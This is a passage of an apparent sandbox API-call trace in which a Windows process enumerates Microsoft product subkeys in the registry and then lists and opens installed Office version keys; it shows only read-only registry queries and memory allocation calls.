[0086.163] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.163] RegEnumKeyExW (in: hKey=0x410, dwIndex=0xe, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IAM", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.163] CoTaskMemFree (pv=0x2baf50)
[0086.163] CoTaskMemFree (pv=0x0)
[0086.163] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.163] RegEnumKeyExW (in: hKey=0x410, dwIndex=0xf, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IME", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.163] CoTaskMemFree (pv=0x2baf50)
[0086.163] CoTaskMemFree (pv=0x0)
[0086.163] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.163] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x10, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IMEJP", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.163] CoTaskMemFree (pv=0x2baf50)
[0086.163] CoTaskMemFree (pv=0x0)
[0086.163] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.163] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x11, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Connection Wizard", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.163] CoTaskMemFree (pv=0x2baf50)
[0086.163] CoTaskMemFree (pv=0x0)
[0086.163] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.163] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x12, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.163] CoTaskMemFree (pv=0x2baf50)
[0086.163] CoTaskMemFree (pv=0x0)
[0086.163] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.163] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x13, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Mail and News", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.163] CoTaskMemFree (pv=0x2baf50)
[0086.163] CoTaskMemFree (pv=0x0)
[0086.163] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.163] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x14, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Java VM", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.163] CoTaskMemFree (pv=0x2baf50)
[0086.163] CoTaskMemFree (pv=0x0)
[0086.164] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.164] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x15, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.164] CoTaskMemFree (pv=0x2baf50)
[0086.164] CoTaskMemFree (pv=0x0)
[0086.164] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.164] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x16, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MediaPlayer", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.164] CoTaskMemFree (pv=0x2baf50)
[0086.164] CoTaskMemFree (pv=0x0)
[0086.164] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.164] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x17, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft Management Console", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.164] CoTaskMemFree (pv=0x2baf50)
[0086.164] CoTaskMemFree (pv=0x0)
[0086.164] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.164] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x18, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MS Design Tools", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.164] CoTaskMemFree (pv=0x2baf50)
[0086.164] CoTaskMemFree (pv=0x0)
[0086.164] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.164] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x19, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MSDAIPP", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.164] CoTaskMemFree (pv=0x2baf50)
[0086.164] CoTaskMemFree (pv=0x0)
[0086.164] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.164] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x1a, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MSF", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.164] CoTaskMemFree (pv=0x2baf50)
[0086.164] CoTaskMemFree (pv=0x0)
[0086.164] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.164] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x1b, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Multimedia", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.164] CoTaskMemFree (pv=0x2baf50)
[0086.164] CoTaskMemFree (pv=0x0)
[0086.164] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.164] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x1c, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Notepad", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.164] CoTaskMemFree (pv=0x2baf50)
[0086.164] CoTaskMemFree (pv=0x0)
[0086.164] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.165] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x1d, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Office", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.165] CoTaskMemFree (pv=0x2baf50)
[0086.165] CoTaskMemFree (pv=0x0)
[0086.165] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.165] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x1e, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OneDrive", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.165] CoTaskMemFree (pv=0x2baf50)
[0086.165] CoTaskMemFree (pv=0x0)
[0086.165] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.165] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x1f, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PeerNet", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.165] CoTaskMemFree (pv=0x2baf50)
[0086.165] CoTaskMemFree (pv=0x0)
[0086.165] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.165] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x20, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Protected Storage System Provider", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.165] CoTaskMemFree (pv=0x2baf50)
[0086.165] CoTaskMemFree (pv=0x0)
[0086.165] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.165] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x21, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RAS AutoDial", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.165] CoTaskMemFree (pv=0x2baf50)
[0086.165] CoTaskMemFree (pv=0x0)
[0086.165] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.165] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x22, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Remote Assistance", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.165] CoTaskMemFree (pv=0x2baf50)
[0086.165] CoTaskMemFree (pv=0x0)
[0086.165] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.165] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x23, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Shared", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.165] CoTaskMemFree (pv=0x2baf50)
[0086.165] CoTaskMemFree (pv=0x0)
[0086.165] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.165] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x24, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Shared Tools", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.165] CoTaskMemFree (pv=0x2baf50)
[0086.165] CoTaskMemFree (pv=0x0)
[0086.165] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.165] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x25, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SideShow", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.166] CoTaskMemFree (pv=0x2baf50)
[0086.166] CoTaskMemFree (pv=0x0)
[0086.166] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.166] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x26, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SkyDrive", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.166] CoTaskMemFree (pv=0x2baf50)
[0086.166] CoTaskMemFree (pv=0x0)
[0086.166] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.166] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x27, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Speech", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.166] CoTaskMemFree (pv=0x2baf50)
[0086.166] CoTaskMemFree (pv=0x0)
[0086.166] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.166] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x28, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SQMClient", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.166] CoTaskMemFree (pv=0x2baf50)
[0086.166] CoTaskMemFree (pv=0x0)
[0086.166] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.166] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x29, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SystemCertificates", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.166] CoTaskMemFree (pv=0x2baf50)
[0086.166] CoTaskMemFree (pv=0x0)
[0086.166] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.166] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x2a, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VBA", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.166] CoTaskMemFree (pv=0x2baf50)
[0086.166] CoTaskMemFree (pv=0x0)
[0086.166] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.166] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x2b, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VisualStudio", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.166] CoTaskMemFree (pv=0x2baf50)
[0086.166] CoTaskMemFree (pv=0x0)
[0086.166] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.166] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x2c, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WAB", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.166] CoTaskMemFree (pv=0x2baf50)
[0086.166] CoTaskMemFree (pv=0x0)
[0086.166] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.166] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x2d, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wfs", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.166] CoTaskMemFree (pv=0x2baf50)
[0086.167] CoTaskMemFree (pv=0x0)
[0086.167] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.167] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x2e, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.167] CoTaskMemFree (pv=0x2baf50)
[0086.167] CoTaskMemFree (pv=0x0)
[0086.167] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.167] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x2f, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Mail", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.167] CoTaskMemFree (pv=0x2baf50)
[0086.167] CoTaskMemFree (pv=0x0)
[0086.167] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.167] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x30, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Media", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.167] CoTaskMemFree (pv=0x2baf50)
[0086.167] CoTaskMemFree (pv=0x0)
[0086.167] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.167] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x31, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows NT", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.167] CoTaskMemFree (pv=0x2baf50)
[0086.167] CoTaskMemFree (pv=0x0)
[0086.167] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.167] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x32, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Script", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.167] CoTaskMemFree (pv=0x2baf50)
[0086.167] CoTaskMemFree (pv=0x0)
[0086.167] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.167] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x33, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Script Host", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.167] CoTaskMemFree (pv=0x2baf50)
[0086.167] CoTaskMemFree (pv=0x0)
[0086.167] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.167] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x34, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Search", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.167] CoTaskMemFree (pv=0x2baf50)
[0086.167] CoTaskMemFree (pv=0x0)
[0086.167] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.167] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x35, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Sidebar", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.167] CoTaskMemFree (pv=0x2baf50)
[0086.167] CoTaskMemFree (pv=0x0)
[0086.167] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.168] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x36, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wisp", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.168] CoTaskMemFree (pv=0x2baf50)
[0086.168] CoTaskMemFree (pv=0x0)
[0086.168] RegOpenKeyExW (in: hKey=0x410, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x40c) returned 0x0
[0086.168] RegCloseKey (hKey=0x410) returned 0x0
[0086.168] RegQueryInfoKeyW (in: hKey=0x40c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c81c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c81c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.168] CoTaskMemFree (pv=0x0)
[0086.168] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.168] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="11.0", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.168] CoTaskMemFree (pv=0x2baf50)
[0086.168] CoTaskMemFree (pv=0x0)
[0086.168] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.168] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="12.0", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.168] CoTaskMemFree (pv=0x2baf50)
[0086.168] CoTaskMemFree (pv=0x0)
[0086.168] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.168] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="14.0", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.168] CoTaskMemFree (pv=0x2baf50)
[0086.168] CoTaskMemFree (pv=0x0)
[0086.168] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.168] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="15.0", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.168] CoTaskMemFree (pv=0x2baf50)
[0086.168] CoTaskMemFree (pv=0x0)
[0086.168] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.168] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="16.0", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.168] CoTaskMemFree (pv=0x2baf50)
[0086.168] CoTaskMemFree (pv=0x0)
[0086.168] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.168] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8.0", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.168] CoTaskMemFree (pv=0x2baf50)
[0086.169] CoTaskMemFree (pv=0x0)
[0086.169] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.169] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Common", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.169] CoTaskMemFree (pv=0x2baf50)
[0086.169] CoTaskMemFree (pv=0x0)
[0086.169] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.169] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Excel", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.169] CoTaskMemFree (pv=0x2baf50)
[0086.169] CoTaskMemFree (pv=0x0)
[0086.169] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.169] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OneNote", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.169] CoTaskMemFree (pv=0x2baf50)
[0086.169] CoTaskMemFree (pv=0x0)
[0086.169] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.169] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Outlook", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.169] CoTaskMemFree (pv=0x2baf50)
[0086.169] CoTaskMemFree (pv=0x0)
[0086.169] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.169] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PowerPoint", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.169] CoTaskMemFree (pv=0x2baf50)
[0086.169] CoTaskMemFree (pv=0x0)
[0086.169] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.169] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.169] CoTaskMemFree (pv=0x2baf50)
[0086.169] CoTaskMemFree (pv=0x0)
[0086.169] RegOpenKeyExW (in: hKey=0x40c, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x410) returned 0x0
[0086.169] RegCloseKey (hKey=0x40c) returned 0x0
